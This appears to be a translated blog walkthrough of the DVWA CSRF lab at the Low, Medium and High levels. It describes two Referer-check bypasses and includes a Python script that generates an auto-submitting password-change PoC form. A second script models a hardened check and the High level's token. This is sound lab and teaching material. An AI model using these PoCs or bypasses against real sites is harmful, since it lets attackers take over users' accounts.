Low level
![](https://i-blog.csdnimg.cn/blog_migrate/66be921c9e9ce3ca11925cf87329ef16.webp?x-image-process=image/format,png)
Capture the request:
![](https://i-blog.csdnimg.cn/blog_migrate/6ee0ceebd7c00ccc33034803f97bc6ba.webp?x-image-process=image/format,png)
The request completes normally:
![](https://i-blog.csdnimg.cn/blog_migrate/b536e7c4e0f8e8fc143f8cb1d1bf4dcd.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/b41eb1623ead990be4e6093b57075ea5.webp?x-image-process=image/format,png)
Here we change the password to qwer:
![](https://i-blog.csdnimg.cn/blog_migrate/78b524bfed139c39a86e408bbc8caae4.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/daea5077266236154c25d271c68b8ead.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/0312073f0f3dd3a13699cf95b1dad538.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/3993a1909f60c20610c4391711a97878.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/fd8b5223bf9149da56023977f979a771.webp?x-image-process=image/format,png)
Logged into DVWA successfully with the new password:
![](https://i-blog.csdnimg.cn/blog_migrate/78d2c660b9ad7b4fbc5fe5b1b7ccf680.webp?x-image-process=image/format,png)
CSRF Medium level:
First, capture the request:
![](https://i-blog.csdnimg.cn/blog_migrate/cda48f79a769dac925bfa1e5c7cf70f3.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/ee4e269364a939f0341050802ef578de.webp?x-image-process=image/format,png)
Clearly the site is checking the Referer header. There are several ways to get past a Referer check:
1) Empty-Referer bypass:
Strip the Referer, or reduce its value to a bare scheme such as http://, https://, ftp:// or file://, resend the request and see whether the check still passes. This defeats checks that only run when a Referer is present.
2) Keyword-match bypass: the check only tests whether the Referer contains a particular substring. In DVWA Medium that substring is the server's own host name (`stripos($_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME'])`), so a Referer from any origin is accepted as long as the host name appears somewhere in it, for example in the file name of the attacker's page.
In this example the second method is used to bypass the Referer check:
![](https://i-blog.csdnimg.cn/blog_migrate/c39433406e5ae36c87feb67e98cc4562.webp?x-image-process=image/format,png)
Build the CSRF PoC:
![](https://i-blog.csdnimg.cn/blog_migrate/9236297011ed5e5e438faebf1d48189b.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/1c2f06d75d1f95debe6cf8e192cc0c5a.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/7be3d7f4c9b727851fcf5bc9ee8c28f1.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/e286c9a11b6ab3c745ac4a9d6fb26ccc.webp?x-image-process=image/format,png)
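The Low and Medium levels above share one PoC: an auto-submitting form that replays the captured password-change parameters, with the Medium bypass coming purely from what the Referer contains. The following is an added example, not DVWA's own code, that models the Medium-level substring check beside a hardened replacement, builds the PoC, and shows the Referer a browser would actually send for it. It assumes DVWA is served at http://127.0.0.1/dvwa/ (so `$_SERVER['SERVER_NAME']` is `127.0.0.1`) and that the PoC is hosted on a hypothetical attacker site, http://attacker.example/. The `<meta name="referrer">` line is the detail worth noting: with the current browser default policy (strict-origin-when-cross-origin) a cross-origin submission sends only the origin, so the host name hidden in the file name would never reach DVWA.

```python
# Added example, not DVWA's code: model of the Medium-level Referer check,
# a hardened replacement, and the Referer a hosted PoC page would send.
# Assumptions: DVWA at http://127.0.0.1/dvwa/ ; PoC hosted on the
# hypothetical site http://attacker.example/.
from typing import Dict, Optional
from urllib.parse import urlsplit

SERVER_NAME = "127.0.0.1"  # assumed value of $_SERVER['SERVER_NAME']
TARGET = f"http://{SERVER_NAME}/dvwa/vulnerabilities/csrf/"


def medium_check(referer: Optional[str]) -> bool:
    """Substring test, as DVWA Medium does with stripos(HTTP_REFERER, SERVER_NAME)."""
    return referer is not None and SERVER_NAME.lower() in referer.lower()


def hardened_check(referer: Optional[str]) -> bool:
    """Parse the Referer and compare the host exactly; a missing Referer is rejected."""
    if not referer:
        return False
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https"):
        return False
    return (parts.hostname or "").lower() == SERVER_NAME.lower()


def build_poc(action: str, fields: Dict[str, str]) -> str:
    """Auto-submitting GET form carrying the captured parameters.

    The referrer meta tag forces the full page URL into the Referer; under the
    browser default policy only the origin would be sent cross-origin, and the
    host name embedded in the PoC's file name would be lost.
    """
    inputs = "".join(
        f'<input type="hidden" name="{k}" value="{v}">' for k, v in fields.items()
    )
    return (
        '<html><head><meta name="referrer" content="unsafe-url"></head><body>'
        f'<form id="f" action="{action}" method="GET">{inputs}</form>'
        '<script>document.getElementById("f").submit();</script></body></html>'
    )


def referer_sent(page_url: str, policy: str) -> str:
    """Referer for a cross-origin top-level navigation from an http page (simplified)."""
    p = urlsplit(page_url)
    if policy == "unsafe-url":
        return page_url
    if policy == "no-referrer":
        return ""
    return f"{p.scheme}://{p.netloc}/"  # strict-origin-when-cross-origin (browser default)


# Constructed sample: the file name carries SERVER_NAME, which is all the
# Medium check looks for. Field names match DVWA's password-change form.
POC_URL = "http://attacker.example/127.0.0.1.html"
POC_FIELDS = {"password_new": "qwer", "password_conf": "qwer", "Change": "Change"}

if __name__ == "__main__":
    print(build_poc(TARGET, POC_FIELDS))
    for policy in ("strict-origin-when-cross-origin", "unsafe-url"):
        ref = referer_sent(POC_URL, policy)
        print(f"{policy:32} Referer={ref!r:45} "
              f"medium={medium_check(ref)} hardened={hardened_check(ref)}")
```

Run stand-alone, the script prints the PoC page and then two rows: under the default policy the Referer is `http://attacker.example/` and even the weak check rejects it; under `unsafe-url` the Referer becomes `http://attacker.example/127.0.0.1.html`, the substring check accepts it, and the host-comparison check still rejects it.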
CSRF High level:
![](https://i-blog.csdnimg.cn/blog_migrate/f197e4046d85ba8ee84259d6a145ba99.webp?x-image-process=image/format,png)
So the approach used at the Low and Medium levels no longer works: every request now needs a valid user_token that changes on each page load. We can still drive the attack from Burp with the CSRF Token Tracker extension, which reads the fresh token out of each response and substitutes it into the next request. Note that this works only because Burp holds the victim's own session; a genuine cross-site attacker cannot read the token without a same-origin foothold such as an XSS on the target, so the extension is a testing convenience rather than a defeat of the token check:
![](https://i-blog.csdnimg.cn/blog_migrate/653aa42bdc85e573cd18aac290280abc.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/553c8730102f650b584570ec184d0dde.webp?x-image-process=image/format,png)
![](https://i-blog.csdnimg.cn/blog_migrate/ae6a8e2f301bf07221554ece6034e574.webp?x-image-process=image/format,png)
Then switch to the Repeater tab:
![](https://i-blog.csdnimg.cn/blog_migrate/5072f8ea4992f961a2f1ed20cff53ec4.webp?x-image-process=image/format,png)
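To make concrete what the token tracker is doing in the Repeater steps above, here is an added example that is neither DVWA's nor the extension's code: a minimal offline model of the High level's session-bound token (issue on form render, compare on POST, rotate after use), a client that re-reads `user_token` from the form before every request the way the extension does, and a cross-site client that has no way to read the form and therefore submits without a token. The class name `DvwaHighModel` and the token format (32 hex characters) are assumptions for the example.

```python
# Added example, not DVWA's or CSRF Token Tracker's code: a session-bound
# anti-CSRF token modelled offline, with a same-session client that tracks
# the token and a cross-site client that cannot.
import hmac
import re
import secrets
from typing import Dict, Optional

# Matches the hidden field DVWA's High-level form renders (assumed 32-hex token).
TOKEN_RE = re.compile(
    r"name=['\"]user_token['\"]\s+value=['\"]([0-9a-f]{32})['\"]", re.IGNORECASE
)


class DvwaHighModel:
    """Hypothetical model of the High level: one user, one session, one token."""

    def __init__(self) -> None:
        self.session: Dict[str, str] = {}
        self.password = "password"

    def render_form(self) -> str:
        """Page load: mint a new token, store it in the session, embed it in the form."""
        self.session["session_token"] = secrets.token_hex(16)
        return (
            '<form action="#" method="POST">'
            '<input type="password" name="password_new">'
            '<input type="password" name="password_conf">'
            f'<input type="hidden" name="user_token" value="{self.session["session_token"]}">'
            "</form>"
        )

    def change_password(self, params: Dict[str, str]) -> bool:
        """POST handler: constant-time compare against the session copy, then rotate."""
        expected = self.session.get("session_token")
        submitted = params.get("user_token", "")
        if not expected or not hmac.compare_digest(expected, submitted):
            return False
        if params.get("password_new") != params.get("password_conf"):
            return False
        self.password = params["password_new"]
        self.session["session_token"] = secrets.token_hex(16)  # single use
        return True


def extract_token(html: str) -> Optional[str]:
    """What the extension does to each response: pull user_token out of the HTML."""
    match = TOKEN_RE.search(html)
    return match.group(1) if match else None


def tracked_change(app: DvwaHighModel, new_pw: str) -> bool:
    """Same-session client (Burp + token tracker): fetch form, read token, submit."""
    token = extract_token(app.render_form())
    return app.change_password(
        {"password_new": new_pw, "password_conf": new_pw, "user_token": token or ""}
    )


def cross_site_change(app: DvwaHighModel, new_pw: str) -> bool:
    """Attacker page on another origin: cannot read the form, so no token to send."""
    return app.change_password({"password_new": new_pw, "password_conf": new_pw})


if __name__ == "__main__":
    app = DvwaHighModel()
    print("tracked   :", tracked_change(app, "qwer"), app.password)
    print("cross-site:", cross_site_change(app, "hacked"), app.password)
```

The two client functions differ only in whether they can see the form page, which is exactly the property the same-origin policy enforces; that is why the tracker is useful for reproducing the request in Repeater and Intruder but says nothing about whether the token can be stolen cross-origin.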